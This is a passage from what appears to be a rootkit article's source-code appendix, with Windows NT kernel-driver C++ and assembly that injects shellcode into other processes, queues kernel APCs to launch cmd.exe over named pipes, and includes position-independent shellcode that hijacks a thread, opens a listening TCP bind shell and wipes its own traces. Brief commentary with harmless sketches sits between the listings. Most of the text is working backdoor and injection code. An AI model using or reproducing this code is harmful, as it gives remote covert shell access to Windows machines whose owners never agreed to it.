      NT::OBJECT_ATTRIBUTES attr={sizeof(NT::OBJECT_ATTRIBUTES), 0,NULL, OBJ_CASE_INSENSITIVE};
      //Open process - get its handle
      NT::ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &clid);
      if (!hProcess) {dbgbkpt;
           return;};
      /*NT::PROCESS_BASIC_INFORMATION pi;
      NT::ZwQueryInformationProcess(hProcess, NT::ProcessBasicInformation, &pi, sizeof(pi), NULL);*/
      ULONG n = sizeof_shellcode;
      PVOID p = 0;
      PVOID EntryPoint;

      //Create code segment - allocate memory into process context
      NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
                      MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      if (!p) {dbgbkpt;
           return;};

      //*((PDWORD)(&shellcode[TID_addr]))=(DWORD)clid.UniqueThread;
      //Write process and thread ID into shellcode, it will be needed for
      //further operations with that thread
      *((NT::PCLIENT_ID)(&shellcode[CLID_addr]))=(NT::CLIENT_ID)clid;
      //Write shellcode to allocated memory
      ZwWriteVirtualMemory(hProcess, p, shellcode, sizeof_shellcode, 0);
      //Entry point is at the beginning of shellcode
      EntryPoint = p;

      //Create stack segment
   NT::USER_STACK stack = {0};
   n = StackReserve;
   NT::ZwAllocateVirtualMemory(hProcess, &stack.ExpandableStackBottom, 0, &n,
                      MEM_RESERVE, PAGE_READWRITE);
      if (!stack.ExpandableStackBottom) {dbgbkpt;
           return;};
   stack.ExpandableStackBase = PCHAR(stack.ExpandableStackBottom)
                    + StackReserve;
   stack.ExpandableStackLimit = PCHAR(stack.ExpandableStackBase)
                     - StackCommit;
   n = StackCommit + PAGE_SIZE;
   p = PCHAR(stack.ExpandableStackBase) - n;
      //Create guard page
      NT::ZwAllocateVirtualMemory(hProcess, &p, 0, &n,
                      MEM_COMMIT, PAGE_READWRITE);
   ULONG x; n = PAGE_SIZE;
   ZwProtectVirtualMemory(hProcess, &p, &n,
                     PAGE_READWRITE | PAGE_GUARD, &x);
      //Initialize new thread context
      //similar to its initialization by the system
   NT::CONTEXT context = {CONTEXT_FULL};
   context.SegGs = 0;
   context.SegFs = 0x38;
   context.SegEs = 0x20;
   context.SegDs = 0x20;
   context.SegSs = 0x20;
   context.SegCs = 0x18;
   context.EFlags = 0x3000;
   context.Esp = ULONG(stack.ExpandableStackBase) - 4;
   context.Eip = ULONG(EntryPoint);
      NT::CLIENT_ID cid;

      //Create and start thread
   ZwCreateThread(&hThread, THREAD_ALL_ACCESS, &attr,
                hProcess, &cid, &context, &stack, TRUE);

      //Here I tried to make the thread alertable. The attempt failed.
      /*HANDLE hTargetThread;
      NT::ZwOpenThread(&hTargetThread, THREAD_ALL_ACCESS, &attr, &clid);
      PVOID ThreadObj;
      NT::ObReferenceObjectByHandle(hTargetThread, THREAD_ALL_ACCESS, NULL, NT::KernelMode, &ThreadObj, NULL);
      *((unsigned char *)ThreadObj+0x4a)=1;*/

   ZwResumeThread(hThread, 0);
}


VOID ShellStarter(VOID* StartShellEvent)
{
      do if (NT::KeWaitForSingleObject(StartShellEvent,NT::Executive,NT::KernelMode,FALSE,NULL)==STATUS_SUCCESS)
           if (Terminating) NT::PsTerminateSystemThread(0); else StartShell();
      while (1);
}
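
Both FindProcess listings advance through the process list with `*pp+=p->NextEntryDelta`, that is, by a byte offset stored in each record rather than in sizeof units. The following is a minimal user-mode sketch of that traversal pattern only. The `Record` type and the `build_records` and `collect_ids` functions are hypothetical names invented for illustration; they are not part of the original sources or of any Windows API.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical variable-length record. Only next_delta mirrors the
// NextEntryDelta idea: a byte offset to the next record, 0 for the last one.
struct Record {
    std::uint32_t next_delta;
    std::uint32_t id;
};

// Build a demo buffer of three records, each followed by a different
// amount of trailing payload, so the records are not evenly spaced.
std::vector<unsigned char> build_records() {
    const std::uint32_t ids[3] = {10, 20, 30};
    const std::uint32_t payload[3] = {4, 12, 0};
    std::vector<unsigned char> buf;
    for (int i = 0; i < 3; ++i) {
        const std::size_t total = sizeof(Record) + payload[i];
        Record r;
        r.id = ids[i];
        r.next_delta = (i == 2) ? 0u : static_cast<std::uint32_t>(total);
        const std::size_t off = buf.size();
        buf.resize(off + total);  // new bytes are zero-initialized
        std::memcpy(&buf[off], &r, sizeof r);
    }
    return buf;
}

// Walk the buffer by byte offsets and collect every record id.
std::vector<std::uint32_t> collect_ids(const unsigned char* base) {
    std::vector<std::uint32_t> ids;
    const unsigned char* cursor = base;
    for (;;) {
        Record r;
        std::memcpy(&r, cursor, sizeof r);  // copy out, no alignment assumptions
        ids.push_back(r.id);
        if (r.next_delta == 0) break;       // last record
        cursor += r.next_delta;             // step in bytes, not in sizeof(Record)
    }
    return ids;
}
```

Using a byte pointer as the cursor gives the same effect as the `char**` alias in the listings, without modifying a typed pointer through a differently typed one.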

----[ 8.2 - ShellAPC.cpp

#include <stdio.h>
#include "ntdll.h"
#include "DynLoadFromNtdll.h"
#include "NtdllDynamicLoader.h"
#include "NebbetCreateProcess.h"

//Debug macro
#if (DBG)
#define dbgbkpt __asm int 3
#else
#define dbgbkpt
#endif

//Flag guarantees that the thread will execute the APC regardless of
//its state
#define SPECIAL_KERNEL_MODE_APC 2

namespace NT
{
      extern "C"
      {
// Definitions for Windows NT-supplied APC routines.
// These are exported in the import libraries,
// but are not in NTDDK.H
           void KeInitializeApc(PKAPC Apc,
                PKTHREAD Thread,
                CCHAR ApcStateIndex,
                PKKERNEL_ROUTINE KernelRoutine,
                PKRUNDOWN_ROUTINE RundownRoutine,
                PKNORMAL_ROUTINE NormalRoutine,
                KPROCESSOR_MODE ApcMode,
                PVOID NormalContext);
           
           void KeInsertQueueApc(PKAPC Apc,
                PVOID SystemArgument1,
                PVOID SystemArgument2,
                UCHAR unknown);
      }
}

//Variant of structure SYSTEM_PROCESSES for NT4
namespace NT {
typedef struct _SYSTEM_PROCESSES_NT4 { // Information Class 5
   ULONG NextEntryDelta;
   ULONG ThreadCount;
   ULONG Reserved1[6];
   LARGE_INTEGER CreateTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER KernelTime;
   UNICODE_STRING ProcessName;
   KPRIORITY BasePriority;
   ULONG ProcessId;
   ULONG InheritedFromProcessId;
   ULONG HandleCount;
   ULONG Reserved2[2];
   VM_COUNTERS VmCounters;
   SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES_NT4, *PSYSTEM_PROCESSES_NT4;
}

//Function searches process with given name.
//Writes PID and TID of first thread to ClientId
BOOL FindProcess(PCWSTR process, OUT NT::PCLIENT_ID ClientId)
{
      NT::UNICODE_STRING ProcessName;
      NT::RtlInitUnicodeString(&ProcessName,process);
      ULONG n=0xFFFF;
      //Allocate some memory
      PULONG q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
      //Request information about processes and threads
      //until it fits in the allocated memory.
   while (NT::ZwQuerySystemInformation(NT::SystemProcessesAndThreadsInformation,
        q, n * sizeof *q, 0))
      {
           //If it didn't fit - free allocated memory...
           NT::ExFreePool(q);
           n*=2;
           //... and allocate twice as much
           q = (PULONG)NT::ExAllocatePool(NT::NonPagedPool,n*sizeof(*q));
      }

      ULONG MajorVersion;
      //Request OS version
      NT::PsGetVersion(&MajorVersion, NULL, NULL, NULL);

      //Copy pointer to SYSTEM_PROCESSES.
      //copy will be modified indirectly
   NT::PSYSTEM_PROCESSES p = NT::PSYSTEM_PROCESSES(q);
      //"process NOT found" - yet
   BOOL found=0;      
      //Pointer to p will be used to indirect modify p.
      //This trick is needed to force compiler to perform arithmetic operations with p
      //in bytes, not in sizeof SYSTEM_PROCESSES units
      char** pp=(char**)&p;
      //Process search cycle
   do
      {
           //If the process has a nonzero number of threads (0 threads is abnormal, but possible)
           //and has a name that matches the one we are looking for...
           if ((p->ThreadCount)&&(p->ProcessName.Buffer)&&(!NT::RtlCompareUnicodeString(&p->ProcessName,&ProcessName,TRUE)))
           {
                //... then copy data about it to variable pointed by ClientId.
                //Accounted for different sizeof SYSTEM_PROCESSES in different versions of NT
                if (MajorVersion<=4)
                      *ClientId = ((NT::PSYSTEM_PROCESSES_NT4)p)->Threads[0].ClientId;
                      else *ClientId = p->Threads[0].ClientId;
                //Set flag "process found"
                found=1;
                //Stop search
                break;
           }
           //No more processes - stop
           if (!(p->NextEntryDelta)) break;
           //Move to next process
           *pp+=p->NextEntryDelta;
      } while(1);
      //Free memory
      NT::ExFreePool(q);
      //Return "is the process found" flag
   return found;
}

//Generates named pipe name similar to used by API-function CreatePipe
void MakePipeName(NT::PUNICODE_STRING KernelPipeName)
{
      //For generation of unrepeating numbers
      static unsigned long      PipeIdx;
      //pseudorandom number
      ULONG                           rnd;           
      //name template
      wchar_t                           *KPNS = L"\\Device\\NamedPipe\\Win32Pipes.%08x.%08x";
      //...and the length of the formatted name in characters, including the terminator
      ULONG                           KPNL = wcslen(KPNS)+(8-4)*2+1;
      //String buffer: allocated here, freed by caller
      wchar_t                           *buf;
      
      //Request system timer: KeQueryInterruptTime is here not for exact
      //counting out time, but for generation of pseudorandom numbers
      rnd = (ULONG)NT::KeQueryInterruptTime();
      //Allocate memory for string
      buf = (wchar_t *)NT::ExAllocatePool(NT::NonPagedPool,(KPNL)*2);
      //Generate name: substitute numbers into template
      _snwprintf(buf, KPNL, KPNS, PipeIdx++, rnd);
      //Write buffer address and string length to KernelPipeName (initialisation)
      NT::RtlInitUnicodeString(KernelPipeName, buf);
}

extern "C" NTSTATUS myCreatePipe1(PHANDLE phPipe, NT::PUNICODE_STRING PipeName, IN ACCESS_MASK DesiredAccess, PSECURITY_DESCRIPTOR sd, ULONG ShareAccess);
extern NTSTATUS BuildAlowingSD(PVOID *sd);

struct APC_PARAMETERS {
      NT::UNICODE_STRING      KernelPipeName;
      ULONG ChildPID;
      };

//APC handler, runs in context of given thread
void KMApcCallback1(NT::PKAPC Apc, NT::PKNORMAL_ROUTINE NormalRoutine,
              PVOID NormalContext, PVOID SystemArgument1,
              PVOID SystemArgument2)
{
      UNREFERENCED_PARAMETER(NormalRoutine);
      UNREFERENCED_PARAMETER(NormalContext);
      
      dbgbkpt;
      //Start process with redirected I/O, SystemArgument1 is named pipe name
      (*(APC_PARAMETERS**)SystemArgument1)->ChildPID=execute_piped(L"\\SystemRoot\\System32\\cmd.exe", &((*(APC_PARAMETERS**)SystemArgument1)->KernelPipeName));
      //Free memory occupied by APC
      NT::ExFreePool(Apc);
      
      //Signal about APC processing completion
      NT::KeSetEvent(*(NT::KEVENT**)SystemArgument2, 0, TRUE);
      return;
}

//Function starts shell process (cmd.exe) with redirected I/O.
//Returns bidirectional named pipe handle in phPipe
extern "C" ULONG StartShell(PHANDLE phPipe)
{
      //_asm int 3;
      HANDLE  hProcess=0, hThread;
      APC_PARAMETERS ApcParameters;
      //Event of APC processing completion
      NT::KEVENT ApcCompletionEvent;
      
      //dbgbkpt;
      NT::CLIENT_ID clid;
      //Look for a process to launch the shell from its context.
      //That process must always be present in the system
      if(!FindProcess(/*L"services.exe"*/L"calc.exe",&clid)) {dbgbkpt;
           return FALSE;};
      NT::OBJECT_ATTRIBUTES attr={sizeof(NT::OBJECT_ATTRIBUTES), 0,NULL, OBJ_CASE_INSENSITIVE};
      //Get process handle from its PID
      NT::ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &attr, &clid);
      if (!hProcess) {dbgbkpt;
           return FALSE;};
      //Get thread handle from its TID
      NT::ZwOpenThread(&hThread, THREAD_ALL_ACCESS, &attr, &clid);
      NT::PKTHREAD ThreadObj;
      //Get pointer to thread object from its handle
      NT::ObReferenceObjectByHandle(hThread, THREAD_ALL_ACCESS, NULL, NT::KernelMode, (PVOID*)&ThreadObj, NULL);
      
      NT::PKAPC Apc;
      ApcParameters.ChildPID=0;

      //Allocate memory for APC
      Apc = (NT::KAPC*)NT::ExAllocatePool(NT::NonPagedPool, sizeof(NT::KAPC));
      //Initialize APC
      dbgbkpt;
      NT::KeInitializeApc(Apc,
    ThreadObj,
    SPECIAL_KERNEL_MODE_APC,
    (NT::PKKERNEL_ROUTINE)&KMApcCallback1,    // kernel mode routine
    0, // rundown routine
    0,    // user-mode routine
    NT::KernelMode,
      0 //context
      );
      //Initialize APC processing completion event
      NT::KeInitializeEvent(&ApcCompletionEvent,NT::SynchronizationEvent,FALSE);
      
      //Generate random unique named pipe name
      MakePipeName(&ApcParameters.KernelPipeName/*, &UserPipeName*/);
      PVOID sd;
      //Access will be read-only without it.
      //This is a weak spot from a security point of view.
      if (BuildAlowingSD(&sd)) return FALSE;
      if (myCreatePipe1(phPipe, &ApcParameters.KernelPipeName, GENERIC_READ | GENERIC_WRITE, sd, FILE_SHARE_READ | FILE_SHARE_WRITE)) return FALSE;
      NT::KeInsertQueueApc(Apc, &ApcParameters, &ApcCompletionEvent, 0);
      NT::KeWaitForSingleObject(&ApcCompletionEvent,NT::Executive,NT::KernelMode,FALSE,NULL);
      NT::RtlFreeUnicodeString(&ApcParameters.KernelPipeName);
      NT::ZwClose(hProcess);
      NT::ZwClose(hThread);
      return ApcParameters.ChildPID;
}
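
MakePipeName sizes its buffer as `wcslen(KPNS)+(8-4)*2+1`: each of the two `%08x` specifiers occupies 4 characters in the template and expands to 8 hex digits, and one more character holds the terminator. Note that this count is in characters; the listing multiplies it by 2 when allocating. The sketch below reproduces only that arithmetic in portable user-mode C++. The function name `make_name` is hypothetical, and the sketch assumes a 32-bit `unsigned int`, so that `%08x` never prints more than 8 digits.

```cpp
#include <cstddef>
#include <cwchar>
#include <string>

// Format the name template with two 32-bit values and return the result.
// Returns an empty string if formatting fails.
std::wstring make_name(unsigned long index, unsigned long rnd) {
    const wchar_t* tmpl = L"\\Device\\NamedPipe\\Win32Pipes.%08x.%08x";
    // Template length, plus 4 extra characters per "%08x", plus terminator.
    const std::size_t chars = std::wcslen(tmpl) + (8 - 4) * 2 + 1;
    std::wstring buf(chars, L'\0');
    const int written = std::swprintf(&buf[0], chars, tmpl,
                                      static_cast<unsigned>(index),
                                      static_cast<unsigned>(rnd));
    if (written < 0) return std::wstring();
    buf.resize(static_cast<std::size_t>(written));  // drop the terminator slot
    return buf;
}
```

With this template the formatted name is always 46 characters long, so the 47-character buffer is exactly large enough.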

----[ 8.3 - dummy4.asm

;Exported symbols - reference points for automated tool
;which generates C code of hex-encoded string
PUBLIC           Start
PUBLIC           EndFile
PUBLIC           CLID_here
;Debug flag - int 3 in the code
DEBUG           EQU      1
;Flag "accept more than 1 connection"
MULTIPLE_CONNECT      EQU      1
;Flag "bind to next port, if current port busy"
RETRY_BIND      EQU      1

.486            ; processor type
.model flat, stdcall  ; model of memory
option casemap: none  ; no case mapping (identifiers are case sensitive)

; includes for file
include Imghdr.inc
include w32.inc
include WSOCK2.INC

; structure initializing
;-------------------------
sSEH STRUCT
OrgEsp        dd ?
SaveEip        dd ?
sSEH ENDS

CLIENT_ID STRUCT
UniqueProcess           dd ?
UniqueThread           dd ?
CLIENT_ID ENDS

OBJECT_ATTRIBUTES STRUCT
Length           dd ?
RootDirectory      dd ?
ObjectName      dd ?
Attributes      dd ?
SecurityDescriptor      dd ?
SecurityQualityOfService      dd ?
OBJECT_ATTRIBUTES ENDS

;-------------------------
.code
;----------------------------------------------
MAX_API_STRING_LENGTH    equ 150
ALLOCATION_GRANULARITY       EQU 10000H
;----------------------------------------------
new_section:
;Macro replaces lea, correcting address for position independence
laa      MACRO      reg, operand
lea      reg, operand
add      reg, FixupDelta
ENDM

;The same, but does not use FixupDelta (autonomous)
laaa      MACRO      reg, operand
local      @@delta
call      $+5
@@delta:
sub       DWORD PTR [esp], OFFSET @@delta
lea      reg, operand
add      reg, DWORD PTR [esp]
add      esp,4
ENDM

main proc
Start:
IFDEF DEBUG
int      3
ENDIF

;Code for evaluating self address
delta:
pop       ebx
sub      ebx,OFFSET delta
;Allocate place for variables in stack
enter      SizeOfLocals,0
;Save difference between load address and ImageBase
mov      FixupDelta,ebx

;Tables, where to write addresses of exported functions
KERNEL32FunctionsTable           EQU      _CreateThread
NTDLLFunctionsTable           EQU      _ZwOpenThread
WS2_32FunctionsTable           EQU      _WSASocket

;Local variables
local flag:DWORD,save_eip:DWORD,_CreateThread:DWORD,_GetThreadContext:DWORD,_SetThreadContext:DWORD,_ExitThread:DWORD,_LoadLibrary:DWORD,_CreateProcessA:DWORD,_Sleep:DWORD,_VirtualFree:DWORD,_ZwOpenThread:DWORD,_ZwAlertThread:DWORD,cxt:CONTEXT,clid:CLIENT_ID,hThread:DWORD,attr:OBJECT_ATTRIBUTES,addr:sockaddr_in,sizeofaddr:DWORD,sock:DWORD,sock2:DWORD,StartInf:STARTUPINFO,ProcInf:PROCESS_INFORMATION,_WSASocket:DWORD,_bind:DWORD,_listen:DWORD,_accept:DWORD,_WSAStartup:DWORD,_closesocket:DWORD,_WSACleanup:DWORD,wsadat:WSAdata,FixupDelta:DWORD =SizeOfLocals
assume fs : nothing
;---- get ImageBase of kernel32.dll ----
lea      ebx,KERNEL32FunctionsTable
push      ebx
laa      ebx,KERNEL32StringTable
push      ebx
push      0FFFF0000h
call GetDllBaseAndLoadFunctions

lea      ebx,NTDLLFunctionsTable
push      ebx
laa      ebx,NTDLLStringTable
push      ebx
push      0FFFF0000h
call GetDllBaseAndLoadFunctions

laa edi, CLID_here
push edi
assume edi:ptr OBJECT_ATTRIBUTES
lea edi,attr
cld
mov      ecx,SIZE OBJECT_ATTRIBUTES
xor      eax,eax
rep stosb
lea edi,attr
mov[edi].Length,SIZE OBJECT_ATTRIBUTES
push edi
push  THREAD_ALL_ACCESS
lea edi,hThread
push      edi
IFDEF DEBUG
int      3
ENDIF
call _ZwOpenThread

lea edi, cxt
assume edi:ptr CONTEXT
mov [edi].cx_ContextFlags,CONTEXT_FULL

xor      ebx,ebx
mov eax,hThread
;there is a thread handle in EAX
;push arguments now for several of the following calls
push edi      ; _SetThreadContext
push eax
;-)
push eax      ; _ZwAlertThread
;-)
push edi      ; _SetThreadContext
push eax
;-)
push edi      ; _GetThreadContext
push eax
call _GetThreadContext

mov      eax,[edi].cx_Eip
mov      save_eip,eax      
laa      eax, new_thread
mov      [edi].cx_Eip, eax

;Self-modify code
;Save EBP to copy current stack in each new thread
laa      eax, ebp_value_here
mov      [eax],ebp
laa      eax, ebp1_value_here
mov      [eax],ebp
;Write address of the flag that signals completion of "create main thread"
laa      eax, flag_addr_here
lea      ebx,flag
mov      [eax],ebx
mov      flag,0

call _SetThreadContext
;If the thread is in a wait state, it will not run until the wait ends or the thread is alerted
call _ZwAlertThread      
;does not work if the wait is nonalertable

;Wait for main thread creation
check_flag:
call      _Sleep,10
cmp      flag,1
jnz      check_flag

;Restore EIP of interrupted thread
mov      eax, save_eip
mov      [edi].cx_Eip, eax
call _SetThreadContext

push      0
call _ExitThread

; --- This code executes in interrupted thread and creates main thread ---
new_thread:
IFDEF DEBUG
int 3
ENDIF
ebp1_value_here_2:
mov      ebp,0
lab_posle_ebp1_value:
ORG ebp1_value_here_2+1
ebp1_value_here:
ORG lab_posle_ebp1_value-main
xor        eax,eax
push       eax
push       eax
push       eax
laa       ebx, remote_shell
push       ebx
push       eax
push       eax
call _CreateThread
;call      _Sleep,INFINITE
jmp      $

remote_shell:
IFDEF DEBUG
int 3
ENDIF
ebp_value_here_2:
mov      esi,0
lab_posle_ebp_value:
ORG ebp_value_here_2+1
ebp_value_here:
ORG lab_posle_ebp_value-main
mov      ecx,SizeOfLocals
sub      esi,ecx
mov      edi,esp
sub      edi,ecx
cld
rep movsb
mov      ebp,esp
sub      esp,SizeOfLocals

flag_addr_here_2:
mov      eax,0
lab_posle_flag_addr:
ORG flag_addr_here_2+1
flag_addr_here:
ORG lab_posle_flag_addr-main
mov      DWORD PTR [eax],1

;Load WinSock
laa      eax,szWSOCK32
call _LoadLibrary,eax
or  eax, eax
jz  quit
   
;---- get ImageBase of ws2_32.dll ----
;I'm doing it backwards: load first, then pretend to search :)
lea      ebx,WS2_32FunctionsTable
push      ebx
laa      ebx,WS2_32StringTable
push      ebx
push      eax
call GetDllBaseAndLoadFunctions


;--- telnet server
lea      eax,wsadat
push      eax
push      0101h
call      _WSAStartup

xor      ebx,ebx
;socket does not suit here!
call      _WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,ebx,ebx,ebx
mov      sock,eax

mov      addr.sin_family,AF_INET
mov      addr.sin_port,0088h
mov      addr.sin_addr,INADDR_ANY

;Look for unused port from 34816 and bind to it
retry_bind:
lea      ebx,addr
call      _bind,sock,ebx,SIZE sockaddr_in
IFDEF RETRY_BIND
or        eax, eax
jz        l_listen
lea      edx,addr.sin_port+1
inc      byte ptr[edx]
cmp      byte ptr[edx],0
;All ports busy...
jz      quit      
jmp      retry_bind
ENDIF

l_listen:
call      _listen,sock,1
or        eax, eax
jnz        quit

ShellCycle:

mov      sizeofaddr,SIZE sockaddr_in
lea      eax,sizeofaddr
push      eax
lea      eax, addr
push      eax
push      sock
call      _accept
mov      sock2, eax

RunCmd:

;int      3

;Zero StartInf
cld
lea      edi,StartInf
xor      eax,eax
mov      ecx,SIZE STARTUPINFO
rep      stosb
;Fill StartInf. Shell will be bound to socket
mov      StartInf.dwFlags,STARTF_USESTDHANDLES; OR STARTF_USESHOWWINDOW
mov      eax, sock2
mov      StartInf.hStdOutput,eax
mov      StartInf.hStdError,eax
mov      StartInf.hStdInput,eax
mov      StartInf.cb,SIZE STARTUPINFO

;Start shell
xor      ebx,ebx
lea      eax,ProcInf
push      eax
lea      eax,StartInf
push      eax
push      ebx
push      ebx
push      CREATE_NO_WINDOW
push      1
push      ebx
push      ebx
laa      eax,CmdLine
push      eax
push      ebx
call      _CreateProcessA

;To avoid hanging sessions
call      _closesocket,sock2

IFDEF MULTIPLE_CONNECT
jmp      ShellCycle
ENDIF

quit:
call      _closesocket,sock
call      _WSACleanup
;Sweep traces: free memory with that code and terminate thread
;Code must not free stack because ExitThread address is there
;It may wipe (zero out) stack in future versions
push      MEM_RELEASE
xor      ebx,ebx
push      ebx
push      OFFSET Start
push      ebx
push      _ExitThread
jmp      _VirtualFree
main endp

; ------ ROUTINES ------

; returns NULL in the case of an error
GetDllBaseAndLoadFunctions proc uses edi esi, dwSearchStartAddr:DWORD, FuncNamesTable:DWORD, FuncPtrsTable:DWORD
;----------------------------------------------
local SEH:sSEH, FuncNameEnd:DWORD,dwDllBase:DWORD,PEHeader:DWORD
; install SEH frame
laaa      eax, KernelSearchSehHandler
push      eax
push fs:dword ptr[0]
mov  SEH.OrgEsp, esp
laaa      eax, ExceptCont
mov  SEH.SaveEip, eax
mov  fs:dword ptr[0], esp

; start the search
mov  edi, dwSearchStartAddr
.while TRUE
   .if word ptr [edi] == IMAGE_DOS_SIGNATURE
     mov  esi, edi
     add  esi, [esi+03Ch]
     .if  dword ptr [esi] == IMAGE_NT_SIGNATURE
       .break
     .endif
   .endif
        ExceptCont:
   sub  edi, 010000h
.endw
mov      dwDllBase,edi
mov      PEHeader,esi

LoadFunctions:
; get the string length of the target Api
mov  edi, FuncNamesTable
mov  ecx, MAX_API_STRING_LENGTH
xor  al, al
repnz  scasb
mov      FuncNameEnd,edi
mov  ecx, edi
sub  ecx, FuncNamesTable     ; ECX -> Api string length

; trace the export table
mov  edx, [esi+078h]    ; EDX -> Export table
add  edx, dwDllBase
assume edx:ptr IMAGE_EXPORT_DIRECTORY
mov  ebx, [edx].AddressOfNames    ; EBX -> AddressOfNames array pointer
add  ebx, dwDllBase
xor  eax, eax     ; eax AddressOfNames Index
.repeat
   mov  edi, [ebx]
   add  edi, dwDllBase
   mov  esi, FuncNamesTable
   push ecx   ; save the api string length
   repz cmpsb
   .if zero?
     add  esp, 4
     .break
   .endif
   pop  ecx
   add  ebx, 4
   inc  eax
.until eax == [edx].NumberOfNames

; did we find something?
.if eax == [edx].NumberOfNames
   jmp ExceptContinue
.endif

; find the corresponding Ordinal
mov  esi, [edx].AddressOfNameOrdinals
add  esi, dwDllBase
shl  eax, 1
add  eax, esi
movzx      eax,word ptr [eax]

; get the address of the api
mov  edi, [edx].AddressOfFunctions
shl  eax, 2
add  eax, dwDllBase
add  eax, edi
mov  eax, [eax]
add  eax, dwDllBase

mov      ecx,FuncNameEnd
mov      FuncNamesTable,ecx
mov      ebx,FuncPtrsTable
mov      DWORD PTR [ebx],eax
mov      esi,PEHeader
cmp      BYTE PTR [ecx],0
jnz       LoadFunctions

Quit:
; shutdown seh frame
pop  fs:dword ptr[0]
add  esp, 4
ret
ExceptContinue:
mov      edi, dwDllBase
jmp ExceptCont
GetDllBaseAndLoadFunctions endp

KernelSearchSehHandler PROC C pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD
mov  eax, pContext
assume eax:ptr CONTEXT
sub  dword ptr [eax].cx_Edi,010000h
mov  eax, 0      ;ExceptionContinueExecution
ret
KernelSearchSehHandler ENDP

KERNEL32StringTable:
szCreateThread       db "CreateThread",0
szGetThreadContext      db "GetThreadContext",0
szSetThreadContext      db "SetThreadContext",0
szExitThread           db "ExitThread",0
szLoadLibrary        db "LoadLibraryA",0
szCreateProcessA      db "CreateProcessA",0
szSleep                db "Sleep",0
szVirtualFree           db "VirtualFree",0
db                0

szWSOCK32           db "WS2_32.DLL",0
WS2_32StringTable:
szsocket           db "WSASocketA",0
szbind                db "bind",0
szlisten           db "listen",0
szaccept           db "accept",0
szWSAStartup           db "WSAStartup",0
szclosesocket           db "closesocket",0
szWSACleanup           db "WSACleanup",0
db                0

NTDLLStringTable:
szZwOpenThread           db "ZwOpenThread",0
szZwAlertThread           db "ZwAlertThread",0
db                0

CmdLine                db      "cmd.exe",0

ALIGN      4
CLID_here           CLIENT_ID <0>

;----------------------------------------------

EndFile:

end Start
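
The listing stores the port with `mov addr.sin_port,0088h` while the comment speaks of port 34816. The two agree because `sin_port` is read in network (big-endian) byte order, whereas x86 stores the 16-bit word little-endian. The retry loop then increments the byte at `sin_port+1`, which is the low byte of the port in network order. The sketch below works through that arithmetic; the helper names `store_le16`, `port_from_bytes`, `first_port` and `last_port` are hypothetical and exist only for this illustration.

```cpp
#include <cstdint>

// Lay out a 16-bit value in memory the way little-endian x86 does.
void store_le16(std::uint16_t value, unsigned char out[2]) {
    out[0] = static_cast<unsigned char>(value & 0xFF);
    out[1] = static_cast<unsigned char>(value >> 8);
}

// Interpret two bytes in memory as a port in network (big-endian) order.
std::uint16_t port_from_bytes(const unsigned char bytes[2]) {
    return static_cast<std::uint16_t>((bytes[0] << 8) | bytes[1]);
}

// Port that results from storing the word 0088h into sin_port.
std::uint16_t first_port() {
    unsigned char b[2];
    store_le16(0x0088, b);      // memory now holds the bytes 88 00
    return port_from_bytes(b);  // 0x8800
}

// Highest port reachable by incrementing only the byte at sin_port+1
// before it wraps around to zero.
std::uint16_t last_port() {
    unsigned char b[2];
    store_le16(0x0088, b);
    b[1] = 0xFF;
    return port_from_bytes(b);  // 0x88FF
}
```

Under these assumptions the bind loop covers at most 256 ports, 34816 through 35071, before the low byte wraps to zero and the code jumps to quit.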


----[ 8.4 - NebbetCreateProcess.cpp

#include <ntdll.h>
#include "DynLoadFromNtdll.h"
#include "NtdllDynamicLoader.h"
extern "C" {
#include "SECSYS.H"
}

namespace NT {

typedef struct _CSRSS_MESSAGE{
      ULONG      Unknwon1;
      ULONG      Opcode;
      ULONG      Status;
      ULONG      Unknwon2;
}CSRSS_MESSAGE,*PCSRSS_MESSAGE;

}

DYNAMIC_LOAD1(CsrClientCallServer)
DYNAMIC_LOAD1(RtlDestroyProcessParameters)
DYNAMIC_LOAD1(ZwWriteVirtualMemory)
DYNAMIC_LOAD1(ZwResumeThread)
DYNAMIC_LOAD1(ZwCreateThread)
DYNAMIC_LOAD1(ZwProtectVirtualMemory)
DYNAMIC_LOAD1(ZwCreateProcess)
DYNAMIC_LOAD1(ZwRequestWaitReplyPort)
DYNAMIC_LOAD1(ZwReadVirtualMemory)
DYNAMIC_LOAD1(ZwCreateNamedPipeFile)
DYNAMIC_LOAD1(LdrGetDllHandle)

//Dynamic import of functions exported from ntdll.dll
extern "C" void LoadFuncs()
{
      static PVOID pNTDLL;
      if (!pNTDLL)
      {
           pNTDLL=FindNT();      
           DYNAMIC_LOAD2(CsrClientCallServer)
           DYNAMIC_LOAD2(RtlDestroyProcessParameters)
           DYNAMIC_LOAD2(ZwWriteVirtualMemory)
           DYNAMIC_LOAD2(ZwResumeThread)
           DYNAMIC_LOAD2(ZwCreateThread)
           DYNAMIC_LOAD2(ZwProtectVirtualMemory)
           DYNAMIC_LOAD2(ZwCreateProcess)
           DYNAMIC_LOAD2(ZwRequestWaitReplyPort)
           DYNAMIC_LOAD2(ZwReadVirtualMemory)
           DYNAMIC_LOAD2(ZwCreateNamedPipeFile)
           DYNAMIC_LOAD2(LdrGetDllHandle)
      }
}

//Informs CSRSS about new win32-process
VOID InformCsrss(HANDLE hProcess, HANDLE hThread, ULONG pid, ULONG tid)
{
//      _asm int 3;
   struct CSRSS_MESSAGE {
      ULONG Unknown1;
      ULONG Opcode;
      ULONG Status;
      ULONG Unknown2;
   };

   struct {
           NT::PORT_MESSAGE PortMessage;
      CSRSS_MESSAGE CsrssMessage;
      PROCESS_INFORMATION ProcessInformation;
      NT::CLIENT_ID Debugger;
      ULONG CreationFlags;
      ULONG VdmInfo[2];
   } csrmsg = {{0}, {0}, {hProcess, hThread, pid, tid}, {0}, 0/*STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW*/, {0}};

   CsrClientCallServer(&csrmsg, 0, 0x10000, 0x24);
}

//Initialize an empty environment
PWSTR InitEnvironment(HANDLE hProcess)
{
   PVOID p=0;
   DWORD dummy=0;
      DWORD n=sizeof(dummy);
      DWORD m;
      m=n;
